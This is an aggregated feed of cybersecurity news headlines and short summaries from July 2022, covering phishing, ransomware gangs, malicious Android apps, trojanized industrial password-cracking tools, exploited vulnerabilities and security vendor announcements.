                2022-07-20 https://www.bleepingcomputer.com/news/security/google-calendar-provides-new-way-to-block-invitation-phishing/
                The Google Workspace team announced today that it started rolling out a new method to block Google Calendar invitation spam, available to all customers, including legacy G Suite Basic and Business users. [...]

                Autosummary: Google Calendar spam examples (BleepingComputer). Phishing campaigns that can reach massive numbers of targets: While, for many, invitation spam might seem to be a harmless issue, spam calendar events can be used to redirect targets to phishing landing pages via malicious URLs.


                LinkedIn remains the most impersonated brand in phishing attacks

                financial
                2022-07-20 https://www.bleepingcomputer.com/news/security/linkedin-remains-the-most-impersonated-brand-in-phishing-attacks/
                LinkedIn is holding the top spot for the most impersonated brand in phishing campaigns observed during the second quarter of 2022. [...]

                Autosummary: Amazon phishing page (Check Point). LinkedIn phishing: As Check Point explains in its report, phishing campaigns using fake LinkedIn emails try to mimic common messages from the platform to its users, such as “You appeared in 8 searchers this week”, or “You have one new message.”


                Another ransomware payment recovered by the Justice Department

                exploits ransomware
                2022-07-20 https://blog.malwarebytes.com/ransomware/2022/07/another-ransomware-payment-recovered-by-the-justice-department/

                The Justice Department announced it was able to forfeit ransomware payments made by health care organizations in Kansas and Colorado.

                The post Another ransomware payment recovered by the Justice Department appeared first on Malwarebytes Labs.

                Autosummary: Maui ransomware: Deputy Attorney General Lisa O. Monaco said at the International Conference on Cyber Security: “Thanks to rapid reporting and cooperation from a victim, the FBI and Justice Department prosecutors have disrupted the activities of a North Korean state-sponsored group deploying ransomware known as ‘Maui.’” Malwarebytes recently reported on the North Korean APT that targets US healthcare sector with Maui ransomware. Although Maui may be a little different from run-of-the-mill ransomware, the steps to protect against it are not: Maintain offsite, offline backups of data and test them regularly.


                More malware-infested apps, downloaded millions of times, found in the Google Play store

                exploits
                2022-07-20 https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/more-malware-infested-apps-found-google-play-store/
                Three million Android users may have lost money and had their devices infected by spyware, after the discovery that the official Google Play store has been distributing apps infected by a new family of malware. Read more in my article on the Tripwire State of Security blog.

                Autosummary: Other malicious apps, which have since been removed from the Google Play Store, include Vlog Star Video Editor (1 million installs) and Creative 3D Launcher (1 million installs).


                Neopets data breach exposes personal data of 69 million members

                financial
                2022-07-20 https://www.bleepingcomputer.com/news/security/neopets-data-breach-exposes-personal-data-of-69-million-members/
                Virtual pet website Neopets has suffered a data breach leading to the theft of source code and a database containing the personal information of over 69 million members. [...]

                Autosummary: The seller claims that this database contains the account information of over 69 million members, including members' usernames, names, email addresses, zip code, date of birth, gender, country, an initial registration email, and other site/game-related information.


                ESET Research Podcast: Hot security topics at RSA or mostly hype?

                industry
                2022-07-20 https://www.welivesecurity.com/2022/07/20/eset-research-podcast-hot-security-topics-rsa-or-mostly-hype/

                Listen to Cameron Camp, Juraj Jánošík, and Filip Mazán discuss the use of machine learning in cybersecurity, followed by Cameron’s insights into the security of medical devices.

                The post ESET Research Podcast: Hot security topics at RSA or mostly hype? appeared first on WeLiveSecurity.


                New Luna ransomware targets Windows, Linux and ESXi systems

                exploits ransomware
                2022-07-20 https://securityaffairs.co/wordpress/133454/cyber-crime/luna-ransomware-rust.html

                Kaspersky researchers discovered a new ransomware family written in Rust, named Luna, that targets Windows, Linux, and ESXi systems. Researchers from Kaspersky Lab detailed a new ransomware family named Luna, which is written in Rust and is able to target Windows, Linux, and ESXi systems. Luna ransomware is the third ransomware family that is written […]

                The post New Luna ransomware targets Windows, Linux and ESXi systems appeared first on Security Affairs.

                Autosummary: The move aims at expanding the pool of potential targets; support for VMware ESXi was already implemented by many ransomware families, including LockBit, HelloKitty, BlackMatter, and REvil.


                82% of global insurers expect the rise in cyber insurance premiums to continue

                ransomware
                2022-07-19 https://www.helpnetsecurity.com/2022/07/19/rise-cyber-insurance-premiums/

                A Panaseer survey of global insurers across the UK and US found that 82% are expecting the rise in premiums to continue, with 74% of insurers agreeing that their inability to accurately understand a customer’s security posture is impacting price increases. Insurers also see the increasing cost of ransomware as a leading factor (78%) affecting premium rises, with the largest ransom pay-outs by insurers in the last two years averaging £3.26m in the UK and $3.52m … More

                The post 82% of global insurers expect the rise in cyber insurance premiums to continue appeared first on Help Net Security.

                Autosummary: This is closely followed by security awareness (36%), along with application security (32%), vulnerability management (31%), privileged access management (31%) and patch management (30%), highlighting that insurers expect to see evidence of a layered, multi-faceted approach to cybersecurity.


                Cybercriminals targeting law enforcement agencies worldwide

                ciber
                2022-07-19 https://www.helpnetsecurity.com/2022/07/19/cybercriminals-targeting-law-enforcement-video/

                Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. This Help Net Security video highlights how cyber attacks affect law enforcement agencies worldwide.

                The post Cybercriminals targeting law enforcement agencies worldwide appeared first on Help Net Security.


                Several New Play Store Apps Spotted Distributing Joker, Facestealer and Coper Malware

                exploits
                2022-07-19 https://thehackernews.com/2022/07/several-new-play-store-apps-spotted.html
                Google has taken steps to ax dozens of fraudulent apps from the official Play Store that were spotted propagating Joker, Facestealer, and Coper malware families through the virtual marketplace. While the Android storefront is considered to be a trusted source for discovering and installing apps, bad actors have repeatedly found ways to sneak past security barriers erected by Google in hopes of …

                Autosummary: Coper is "capable of intercepting and sending SMS text messages, making USSD (Unstructured Supplementary Service Data) requests to send messages, keylogging, locking/unlocking the device screen, performing overlay attacks, preventing uninstalls and generally allowing attackers to take control and execute commands on infected devices via remote connection with a C2 server," the researchers said.


                Several apps on the Play Store used to spread Joker, Facestealer and Coper malware

                exploits
                2022-07-19 https://securityaffairs.co/wordpress/133394/malware/play-store-apps-joker-facestealer-coper.html

                Google blocked dozens of malicious apps from the official Play Store that were spreading Joker, Facestealer, and Coper malware families. Google has removed dozens of malicious apps from the official Play Store that were distributing Joker, Facestealer, and Coper malware families. Researchers from security firm Pradeo discovered multiple apps spreading the Joker Android malware. The […]

                The post Several apps on the Play Store used to spread Joker, Facestealer and Coper malware appeared first on Security Affairs.

                Autosummary: “Once downloaded, this app unleashes the Coper malware infection which is capable of intercepting and sending SMS text messages, making USSD (Unstructured Supplementary Service Data) requests to send messages, keylogging, locking/unlocking the device screen, performing overlay attacks, preventing uninstalls and generally allowing attackers to take control and execute commands on infected devices via remote connection with a C2 server,” continues the report.


                New CloudMensis malware backdoors Macs to steal victims’ data

                exploits
                2022-07-19 https://www.bleepingcomputer.com/news/security/new-cloudmensis-malware-backdoors-macs-to-steal-victims-data/
                Unknown threat actors are using previously undetected malware to backdoor macOS devices and exfiltrate information in a highly targeted series of attacks. [...]

                Autosummary: For instance, they could exploit the Microsoft-discovered powerdir flaw (CVE-2021-30970), Time Machine mounts (CVE-2020-9771), environment variable poisoning (CVE-2020-9934), or a bundle conclusion issue (CVE-2021-30713).


                PayPal phishing campaign goes after more than just your login credentials

                financial
                2022-07-19 https://blog.malwarebytes.com/social-engineering/2022/07/paypal-phishing-campaign-goes-after-more-than-just-your-login-credentials/

                Scammers have created a PayPal phishing campaign that extensively asks for sensitive information, including government IDs and headshot photos.

                The post PayPal phishing campaign goes after more than just your login credentials appeared first on Malwarebytes Labs.

                Autosummary: Next, the scammers ask users for yet more information, specifically their ATM PIN, social security number (SSN), and their mother’s maiden name—a bit of detail that could bypass an additional security layer for an account. The PayPal phishing site then encourages users to link an email address to their PayPal account, giving the attackers a token, and therefore access, to that email account.


                Who on earth would be trying to promote EC-Council University via comment spam on my website?

                government
                2022-07-19 https://grahamcluley.com/ec-council-university-comment-spam/
                I can't tell you not to seek ethical hacking certification from EC-Council. But I can suggest that if you are looking for an online university to boost your cybersecurity career, you don't settle for an outfit that has proven itself to be of questionable ethics and utterly clueless.

                Autosummary: Take this, for instance: What’s unusual about this piece of comment spam is that it’s not shilling dodgy medications, an essay-writing service, or foot fetish videos, but a website from EC-Council, a “legitimate” cybersecurity organisation.


                Building materials giant Knauf hit by Black Basta ransomware gang

                exploits ransomware
                2022-07-19 https://www.bleepingcomputer.com/news/security/building-materials-giant-knauf-hit-by-black-basta-ransomware-gang/
                The Knauf Group has announced it has been the target of a cyberattack that has disrupted its business operations, forcing its global IT team to shut down all IT systems to isolate the incident. [...]

                Autosummary: Black Basta leaked 20% of the stolen files. Bleeping Computer has seen samples of email communication, user credentials, employee contact information, production documents, and ID scans.


                EU warns of Russian cyberattack spillover, escalation risks

                ciber
                2022-07-19 https://www.bleepingcomputer.com/news/security/eu-warns-of-russian-cyberattack-spillover-escalation-risks/
                The Council of the European Union (EU) said today that Russian hackers and hacker groups increasingly attacking "essential" organizations worldwide could lead to spillover risks and potential escalation. [...]

                Autosummary: In related news, in July 2021, President Joe Biden warned that cyberattacks leading to severe security breaches could lead to a "real shooting war," a statement issued a month after NATO said that cyberattacks could be compared to "armed attacks" in some circumstances.


                Conceal and Carahsoft join forces to protect government customers from ransomware

                exploits government ransomware
                2022-07-19 https://www.helpnetsecurity.com/2022/07/20/conceal-carahsoft/

                Conceal announced a partnership with Carahsoft to protect government agencies from ransomware using the Conceal Platform which incorporates intelligence-grade, zero trust technology. “Conceal has developed a powerful new approach to ransomware protection that uses isolation to prevent malware from targeting an organization’s users and infrastructure, and executing on endpoints,” said Craig P. Abod, Carahsoft President. “This partnership allows Carahsoft and our reseller partners to provide our Government customers with unprecedented security for their end users, … More

                The post Conceal and Carahsoft join forces to protect government customers from ransomware appeared first on Help Net Security.



                Industrial cybersecurity leaders are making considerable headway

                industry ciber
                2022-07-18 https://www.helpnetsecurity.com/2022/07/18/industrial-cybersecurity-leaders-making-headway/

                Increased cyber threats and government directives have made cybersecurity a top priority among critical infrastructure organizations. A zero trust security architecture is the gold standard for blocking and containing threats, but there’s been heavy skepticism around the practicality of implementing zero trust in operational technology (OT) environments with the mix of legacy and modern equipment. A study from Wakefield Research suggests that despite this skepticism, industrial cybersecurity leaders are making significant progress. The survey conducted … More

                The post Industrial cybersecurity leaders are making considerable headway appeared first on Help Net Security.

                Autosummary: Tactics for accelerating implementations include integrating zero trust into organizational culture (68%); incorporating Identity and Access Management (IAM) practices or tools (66%), while avoiding “rip and replace” of existing networks and systems; setting a formal process to define zero trust goals (60%); and assessing weaknesses in the existing OT security architecture (60%).


                Beware of password-cracking software for PLCs and HMIs!

                industry
                2022-07-18 https://www.helpnetsecurity.com/2022/07/18/password-cracking-plcs-hmis/

                A threat actor is targeting industrial engineers and operators with trojanized password-cracking software for programmable logic controllers (PLCs) and human-machine interfaces (HMIs), exploiting their pressing needs to turn industrial workstations into dangerous bots. According to Dragos researchers, the adversary seems not to be interested in disrupting industrial processes but making money. The password-cracking software also carries a dropper that infects the machine with Sality malware, which: Uses process injection and file infection to achieve persistence … More

                The post Beware of password-cracking software for PLCs and HMIs! appeared first on Help Net Security.

                Autosummary: These appear to be tailor-made to work on PLCs and HMIs by AutomationDirect, Omron, Siemens, ABB, Delta Automation, Fuji Electric, Mitsubishi Electric, Pro-Face, Vigor Electric, Weintek, Allen-Bradley, Panasonic, Fatek, IDEC Corp., and LG.


                Roaming Mantis hits Android and iOS users in malware, phishing attacks

                financial exploits
                2022-07-18 https://www.bleepingcomputer.com/news/security/roaming-mantis-hits-android-and-ios-users-in-malware-phishing-attacks/
                After hitting Germany, Taiwan, South Korea, Japan, the US, and the U.K., the Roaming Mantis operation moved to targeting Android and iOS users in France, likely compromising tens of thousands of devices. [...]

                Autosummary: The APK executes and mimics a Chrome installation, requesting risky permissions such as SMS interception, making phone calls, reading and writing storage, handling system alerts, getting accounts list, and more.


                Extortionists target restaurants, demand money to take down bad reviews

                financial
                2022-07-18 https://blog.malwarebytes.com/social-engineering/2022/07/extortionists-target-restaurants-demand-money-to-take-down-bad-reviews/

                We take a look at reports of organised review bombing, leading to extortion threats to get the negative ratings removed.

                The post Extortionists target restaurants, demand money to take down bad reviews appeared first on Malwarebytes Labs.

                Autosummary: No matter which rules you feel that your extortion-laced missives fall under, here’s how to report in both Maps and Search. Flag a review in Google Maps: on your computer, open Google Maps.


                SecurityScorecard partners with NACo to improve cybersecurity posture for U.S. county governments

                government ciber
                2022-07-18 https://www.helpnetsecurity.com/2022/07/18/securityscorecard-naco/

                In its ongoing effort to improve the security posture of federal, state and local government agencies, SecurityScorecard announced a partnership with The National Association of Counties (NACo). Through this partnership, U.S. county governments will gain access to SecurityScorecard’s cybersecurity ratings platform to monitor and improve cybersecurity risk. NACo successfully piloted SecurityScorecard’s cybersecurity ratings platform, which involved 38 counties. SecurityScorecard’s platform is now available in the NACo County Tech Xchange, an online portal that connects more … More

                The post SecurityScorecard partners with NACo to improve cybersecurity posture for U.S. county governments appeared first on Help Net Security.



                Mind the Gap – How to Ensure Your Vulnerability Detection Methods are up to Scratch

                exploits
                2022-07-18 https://thehackernews.com/2022/07/mind-gap-how-to-ensure-your.html
                With global cybercrime costs expected to reach $10.5 trillion annually by 2025, it comes as little surprise that the risk of attack is companies' biggest concern globally. To help businesses uncover and fix the vulnerabilities and misconfigurations affecting their systems, there is an (over)abundance of solutions available. But beware, they may not give you a full and continuous view of your

                Autosummary: Fortunately, some solutions – such as Intruder Vanguard – take a faster, more proactive approach, finding the proof-of-concept exploit, breaking it down, and then checking all its customers – often before the scanning vendors have started their checks. To avoid this, you need a solution that takes into account your specific environment, i.e., the types of systems you have deployed, the configuration of these systems, the data stored within them, and the mitigating controls you have in place.


                Hackers Distributing Password Cracking Tool for PLCs and HMIs to Target Industrial Systems

                industry
                2022-07-18 https://thehackernews.com/2022/07/hackers-distributing-password-cracking.html
                Industrial engineers and operators are the target of a new campaign that leverages password cracking software to seize control of Programmable Logic Controllers (PLCs) and co-opt the machines to a botnet. The software "exploited a vulnerability in the firmware which allowed it to retrieve the password on command," Dragos security researcher Sam Hanson said. "Further, the software was a malware "



                Google Boots Multiple Malware-laced Android Apps from Marketplace

                exploits
                2022-07-18 https://threatpost.com/google-boots-malware-marketplace/180241/
                Google removed eight Android apps, with 3M cumulative downloads, from its marketplace for being infected with a Joker spyware variant.

                Autosummary: Lag Time in Discovery and App Removal: The eight apps in which Ingrao discovered Autolycos are Vlog Star Video Editor (com.vlog.star.video.editor), 1 million downloads; Creative 3D Launcher (app.launcher.creative3d), 1 million downloads; Wow Beauty Camera (com.wowbeauty.camera), 100,000 downloads; Gif Emoji Keyboard (com.gif.emoji.keyboard), 100,000 downloads; Freeglow Camera 1.0.0 (com.glow.camera.open), 5,000 downloads; Coco Camera v1.1 (com.toomore.cool.camera), 1,000 downloads; Funny Camera by KellyTech, 500,000 downloads; and Razer Keyboard & Theme by rxcheldiolola, 50,000 downloads. After the apps with Joker were installed, they would show a “splash” screen, which would display the app logo, to throw off victims while performing various malicious processes in the background, such as stealing SMSes and contact lists as well as performing ad fraud and signing people up for subscriptions without their knowledge.


                CISA Urges Patch of Exploited Windows 11 Bug by Aug. 2

                exploits
                2022-07-18 https://threatpost.com/cisa-urges-patch-11-bug/180235/
                Feds urge U.S. agencies to patch a Microsoft July Patch Tuesday 2022 bug that is being exploited in the wild by August 2.

                Autosummary: The recommendation is directed at federal agencies and concerns CVE-2022-22047, a vulnerability that carries a CVSS score of high (7.8) and exposes the Windows Client Server Runtime Subsystem (CSRSS) used in Windows 11 (and earlier versions dating back to 7) and also Windows Server 2022 (and earlier versions 2008, 2012, 2016 and 2019) to attack.


                A massive cyberattack hit Albania

                ciber
                2022-07-18 https://securityaffairs.co/wordpress/133363/cyber-warfare-2/albania-cyber-attack.html

                A synchronized criminal attack from abroad hit Albania over the weekend; all Albanian government systems were shut down following the cyberattack. Albania was hit by a massive cyberattack over the weekend, the government confirmed on Monday. A synchronized criminal attack from abroad hit the servers of the National Agency for Information Society (AKSHI), which handles many […]

                The post A massive cyberattack hit Albania appeared first on Security Affairs.

                Autosummary: Most of the desk services for the population were interrupted, and only several important services, such as online tax filing, are still working because they are provided by servers not targeted in the attack.


                Experts Notice Sudden Surge in Exploitation of WordPress Page Builder Plugin Vulnerability

                exploits
                2022-07-18 https://thehackernews.com/2022/07/experts-notice-sudden-surge-in.html
                Researchers from Wordfence have sounded the alarm about a "sudden" spike in cyber attacks attempting to exploit an unpatched flaw in a WordPress plugin called Kaswara Modern WPBakery Page Builder Addons. Tracked as CVE-2021-24284, the issue is rated 10.0 on the CVSS vulnerability scoring system and relates to an unauthenticated arbitrary file upload that could be abused to gain code execution,


                Week in review: Kali Linux gets on Linode, facial recognition defeated, Log4j exploitation

                exploits
                2022-07-17 https://www.helpnetsecurity.com/2022/07/17/week-in-review-kali-linux-gets-on-linode-facial-recognition-defeated-log4j-exploitation/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Dealing with threats and preventing sensitive data loss Recently, Normalyze, a data-first cloud security platform, came out of stealth with $22.2M in Series A funding. This was the perfect time to catch up with co-founder and CEO Amer Deeba. In this interview with Help Net Security, he talks about the path to data security as well as visibility challenges. Who are … More

                The post Week in review: Kali Linux gets on Linode, facial recognition defeated, Log4j exploitation appeared first on Help Net Security.

                Autosummary: How attackers abuse Quickbooks to send phone scam emails: In this Help Net Security video, Roger Kay, VP of Security Strategy, INKY, talks about how this time around, attackers impersonated reputable retail brands such as Amazon, Apple, and Paypal, to send out legitimate notifications from QuickBooks, an accounting software package used primarily by small business and midmarket customers who lack in-house expertise in finance and accounting. New infosec products of the week: July 15, 2022: Here’s a look at the most interesting products from the past week, featuring releases from Deloitte, Flashpoint, CertiK, CyberArk, and N-able.


                Hackers Targeting VoIP Servers By Exploiting Digium Phone Software

                exploits
                2022-07-16 https://thehackernews.com/2022/07/hackers-targeting-voip-servers-by.html
                VoIP phones using Digium's software have been targeted to drop a web shell on their servers as part of an attack campaign designed to exfiltrate data by downloading and executing additional payloads. "The malware installs multilayer obfuscated PHP backdoors to the web server's file system, downloads new payloads for execution, and schedules recurring tasks to re-infect the host system," Palo


                New Netwrix Auditor Bug Could Let Attackers Compromise Active Directory Domain

                exploits
                2022-07-16 https://thehackernews.com/2022/07/new-netwrix-auditor-bug-could-let.html
                Researchers have disclosed details about a security vulnerability in the Netwrix Auditor application that, if successfully exploited, could lead to arbitrary code execution on affected devices. "Since this service is typically executed with extensive privileges in an Active Directory environment, the attacker would likely be able to compromise the Active Directory domain," Bishop Fox said in an


                Threat actors exploit a flaw in Digium Phone Software to target VoIP servers

                exploits
                2022-07-16 https://securityaffairs.co/wordpress/133293/hacking/digium-phones-attacks.html

                Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium’s software to install a web shell, Palo Alto Networks warns. Recently, Unit 42 researchers spotted a campaign targeting the Elastix system used in Digium phones since December 2021. Threat actors exploited a vulnerability, tracked as CVE-2021-45461 (CVSS score 9.8), in the Rest Phone Apps (restapps) module to implant […]

                The post Threat actors exploit a flaw in Digium Phone Software to target VoIP servers appeared first on Security Affairs.

                Autosummary: The malicious campaign has many similarities to the INJ3CTOR3 campaign detailed by Check Point Research in 2020, two years ago; experts speculate it could be a resurgence of that campaign. The attack chain starts with code retrieving a shell script dropper from a remote server, which, in turn, downloads and executes an obfuscated PHP backdoor in multiple locations in the file system.


                ChaosSearch enhances log analytics capabilities to eliminate architectural complexity challenges

                industry
                2022-07-15 https://www.helpnetsecurity.com/2022/07/15/chaossearch-cloud-data-platform/

                ChaosSearch announced enhancements to its log analytics capabilities that make it easier for organizations to conduct exploratory and investigative analytics at scale. Built within the ChaosSearch Cloud Data Platform and now available to all customers, the augmented capabilities eliminate the architectural complexity and challenges created by traditional data platforms and dramatically improve time to insights, data reliability, and cost. The amount and variety of data being generated by businesses has grown exponentially in the last … More

                The post ChaosSearch enhances log analytics capabilities to eliminate architectural complexity challenges appeared first on Help Net Security.

                Autosummary: “If you’re using any of the existing database platforms today, there is simply no way you’re looking at more than one day’s worth of data at a time without an astronomical price tag,” said Thomas Hazel, Founder, CTO, Chief Scientist, ChaosSearch.


                Samsung introduces 24Gbps GDDR6 DRAM to advance next-generation graphics cards

                industry
                2022-07-15 https://www.helpnetsecurity.com/2022/07/15/samsung-24gbps-gddr6-dram/

                Samsung announced that it has begun sampling the 16-gigabit (Gb) Graphics Double Data Rate 6 (GDDR6) DRAM featuring 24-gigabit-per-second (Gbps) processing speeds. Built on Samsung’s third-generation 10-nanometer-class (1z) process using extreme ultraviolet (EUV) technology, the new memory is designed to significantly advance the graphics performance for next-generation graphics cards (Video Graphics Arrays), laptops and game consoles, as well as artificial intelligence-based applications and high-performance computing (HPC) systems. “The explosion of data now being driven by … More

                The post Samsung introduces 24Gbps GDDR6 DRAM to advance next-generation graphics cards appeared first on Help Net Security.



                The proliferation of money mules and how behavioral biometrics can combat this form of fraud

                financial industry
                2022-07-15 https://www.helpnetsecurity.com/2022/07/15/money-mules-behavioral-biometrics-video/

                In the first half of 2022, BioCatch estimates fraudulent transfers to money mule accounts totaled $3 billion and that there are approximately 2 million mule accounts in the US. Additionally, researchers found that the average mule transaction amount is $1,500 – a low amount to avoid detection when executing mule campaigns at a large scale. In this Help Net Security video, Erin Englund, Threat Analytics Lead at BioCatch, explains what money mules are, why are … More

                The post The proliferation of money mules and how behavioral biometrics can combat this form of fraud appeared first on Help Net Security.



                How to address the ongoing risk of Log4j exploitation and prepare for the future

                exploits
                2022-07-15 https://www.helpnetsecurity.com/2022/07/15/log4j-risk/

                “Vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer,” the Cyber Safety Review Board (CSRB) has concluded. Log4j exploitation: Risk and effects of remediation efforts The report concentrates on Log4Shell and other vulnerabilities that were discovered (and exploited) last year in the open-source Log4j library. While cybersecurity vendors continue to flag attacks involving Log4Shell exploitation, “the Board also found that to date, generally speaking, exploitation of … More

                The post How to address the ongoing risk of Log4j exploitation and prepare for the future appeared first on Help Net Security.

                Autosummary: The CSRB’s analysis of the entire Log4j event has allowed them to formulate recommendations for various government and private sector stakeholders for: addressing the continued risk of Log4j exploitation; improving vulnerability management and security hygiene; building a better software ecosystem; and making the necessary cultural and technological changes to improve US digital security in the long run. Luta Security CEO Katie Moussouris, a cybersecurity leader and member of the CSRB, has summarized the lessons organizations, software makers and open-source maintainers can learn from this report.


                North Korean Hackers Targeting Small and Midsize Businesses with H0lyGh0st Ransomware

                exploits ransomware
                2022-07-15 https://thehackernews.com/2022/07/north-korean-hackers-targeting-small.html
                An emerging threat cluster originating from North Korea has been linked to developing and using ransomware in cyberattacks targeting small businesses since September 2021. The group, which calls itself H0lyGh0st after the ransomware payload of the same name, is being tracked by the Microsoft Threat Intelligence Center under the moniker DEV-0530, a designation assigned for unknown, emerging, or a

                Autosummary: The ransomware threat evolves in a post-Conti world: The development also comes as the ransomware landscape is evolving with existing and new ransomware groups, namely LockBit, Hive, Lilith, RedAlert (aka N13V), and 0mega, even as the Conti gang formally shuttered its operations in response to a massive leak of its internal chats.


                RedAlert, LILITH, and 0mega, 3 new ransomware in the wild

                exploits ransomware
                2022-07-15 https://securityaffairs.co/wordpress/133248/cyber-crime/lilith-redalert-0mega-ransomware.html

                Cyble researchers warn of three new ransomware operations named Lilith, RedAlert and 0mega targeting organizations worldwide. Researchers from threat intelligence firm Cyble warn of new ransomware gangs that surfaced recently, named Lilith, RedAlert, and 0mega. RedAlert (aka N13V) targets both Windows and Linux VMWare ESXi servers of target organizations. The name RedAlert comes after a string […]

                The post RedAlert, LILITH, and 0mega, 3 new ransomware in the wild  appeared first on Security Affairs.

                Autosummary: The ransomware targets a limited set of file types, including log files (.log), swap files (.vswp), virtual disks (.vmdk), snapshot files (.vmsn) and memory files (.vmem) of VMware ESXi virtual machines.


                Holy Ghost ransomware operation is linked to North Korea

                exploits ransomware
                2022-07-15 https://securityaffairs.co/wordpress/133255/hacking/holy-ghost-ransomware-north-korea.html

                Microsoft researchers linked the Holy Ghost ransomware (H0lyGh0st) operation to North Korea-linked threat actors. The Microsoft Threat Intelligence Center (MSTIC) researchers linked the activity of the Holy Ghost ransomware (H0lyGh0st) operation to a North Korea-linked group they tracked as DEV-0530. The Holy Ghost ransomware gang has been active since June 2021 and it conducted ransomware […]

                The post Holy Ghost ransomware operation is linked to North Korea appeared first on Security Affairs.



                Password recovery tool infects industrial systems with Sality malware

                exploits industry
                2022-07-15 https://www.bleepingcomputer.com/news/security/password-recovery-tool-infects-industrial-systems-with-sality-malware/
                A threat actor is infecting industrial control systems (ICS) to create a botnet through password "cracking" software for programmable logic controllers (PLCs). [...]

                Autosummary: Advertised on various social media platforms, the password recovery tools promise to unlock PLC and HMI (human-machine interface) terminals from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Pro-Face, Allen Bradley, Weintek, ABB, and Panasonic.


                Emerging H0lyGh0st Ransomware Tied to North Korea

                exploits ransomware
                2022-07-15 https://threatpost.com/h0lygh0st-ransomware-north-korea/180232/
                Microsoft has linked a threat that emerged in June 2021 and targets small-to-mid-sized businesses to state-sponsored actors tracked as DEV-0530.

                Autosummary: The group has successfully compromised small-to-mid-sized businesses—including manufacturing organizations, banks, schools, and event and meeting planning companies—in multiple countries starting as early as September, researchers from MSTIC and the Microsoft Digital Security Unit (MDSU) said in a blog post published Thursday. Later in the group’s evolution, between October 2021 and May 2022, MSTIC observed a cluster of new DEV-0530 ransomware variants written in Go, which they classify as SiennaBlue variants, they said.


                Tainted password-cracking software for industrial systems used to spread P2P Sality bot

                industry
                2022-07-15 https://securityaffairs.co/wordpress/133281/malware/sality-malware-industrial-systems.html

                Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators with Sality malware. Threat actors behind the campaign used multiple accounts across several social media platforms to advertise password-cracking software for Programmable Logic Controller (PLC), Human-Machine […]

                The post Tainted password-cracking software for industrial systems used to spread P2P Sality bot appeared first on Security Affairs.

                Autosummary: The password recovery software is advertised as working against industrial systems from ABB, Allen Bradley, Automation Direct, Fuji Electric, LG, Vigor, Mitsubishi, Omron, Panasonic, Pro-Face, Siemens, and Weintek.


                Catalogic DPX 4.8.1 strengthens ransomware protection for customers

                exploits ransomware
                2022-07-14 https://www.helpnetsecurity.com/2022/07/14/catalogic-dpx-4-8-1/

                Catalogic Software released the newest version of Catalogic DPX, the company’s enterprise data protection software. DPX 4.8.1 introduces GuardMode, a feature providing early detection of ransomware and DPX vPlus, cloud data protection for Microsoft 365 and other open virtualization platforms. “Cybercriminals are constantly innovating, costing US victims $49.2 million in losses to ransomware attacks last year alone – and that is just based on incidents reported to the FBI,” said Krista Macomber, Senior Analyst, Evaluator … More

                The post Catalogic DPX 4.8.1 strengthens ransomware protection for customers appeared first on Help Net Security.

                Autosummary: With DPX vPlus, Catalogic provides data protection for Microsoft 365 and other open virtualization platforms such as RHV/oVirt, Acropolis, XenServer, Oracle VM and KVM.


                Kudelski IoT Secure IP increases hardware security for semiconductor manufacturers

                industry
                2022-07-14 https://www.helpnetsecurity.com/2022/07/14/kudelski-iot-secure-ip/

                Kudelski IoT launched its Secure IP portfolio, giving semiconductor manufacturers robust cryptographic capabilities when integrated into their system on chip (SoC) products. Companies benefit from a rich array of security services, which are more powerful integrated in hardware than software, while also enabling compliance with most common industry security standards including NIST, FIPS, PSA and SESIP Level 3 or higher. “Silicon hardware-based security offers better protection from manipulation and interference than its software-based counterpart because … More

                The post Kudelski IoT Secure IP increases hardware security for semiconductor manufacturers appeared first on Help Net Security.

                Autosummary: “We see increasing regulation and demand for security in almost every IoT market, ranging from consumer IoT, automotive, industrial, telco, medical, and asset tracking,” said Frédéric Thomas, CTO of Kudelski IoT.


                How attackers abuse Quickbooks to send phone scam emails

                financial
                2022-07-14 https://www.helpnetsecurity.com/2022/07/14/abuse-quickbooks-send-phone-scam-emails-video/

                INKY researchers disclosed the latest variant of the tried-and-true phone scam, a low-tech phone scam where attackers extract personal information by sending out spoofed emails from what appears to be a legitimate source, with no suspicious links or malware attachments, just a pitch and a phone number. In this Help Net Security video, Roger Kay, VP of Security Strategy, INKY, talks about how this time around, attackers impersonated reputable retail brands such as Amazon, Apple, … More

                The post How attackers abuse Quickbooks to send phone scam emails appeared first on Help Net Security.

                "



                Conventional cybersecurity approaches are falling short

                ciber
                2022-07-14 https://www.helpnetsecurity.com/2022/07/14/conventional-cybersecurity-approaches/

                Traditional security approaches that rely on reactive, detect-and-respond measures and tedious manual processes can’t keep pace with the volume, variety, and velocity of current threats, according to Skybox Security. As a result, 27% of all executives and 40% of CSOs say their organizations are not well prepared for today’s rapidly shifting threat landscape. A tipping point for conventional cybersecurity On average, organizations experienced 15% more cybersecurity incidents in 2021 than in 2020. In addition, “material … More

                The post Conventional cybersecurity approaches are falling short appeared first on Help Net Security.

                "

                Autosummary: Looking more closely at the ingredients of a risk-based approach and the specific practices that distinguish risk-oriented organizations from their less proficient peers, the benchmark study found that risk-based leaders excelled in key areas beyond the NIST framework, including:
                - Attack surface visibility and context
                - Attack simulation
                - Exposure analysis
                - Risk scoring
                - Vulnerability assessments
                - Research (threat intelligence)
                - Technology assessments and consolidation
                The business impact of successful risk-based security management — versus the old status-quo, detect-and-respond approach — is measured in this research.


                PayPal-themed phishing kit allows complete identity theft

                financial
                2022-07-14 https://www.helpnetsecurity.com/2022/07/14/paypal-themed-phishing-kit/

                Sometimes phishers are just after your username and password, but other times they are after every scrap of sensitive information they can extract from you. To do that, they use tools like the phishing kit recently analyzed by Akamai researchers. By misusing the PayPal logo and general design, the phishing kit leads users through a set of pages and forms aimed at collecting information that can later be used to steal the victims’ identity and … More

                The post PayPal-themed phishing kit allows complete identity theft appeared first on Help Net Security.

                "



                Smart factories need to prioritize their cybersecurity

                ciber
                2022-07-14 https://www.helpnetsecurity.com/2022/07/14/smart-factories-prioritize-cybersecurity-video/

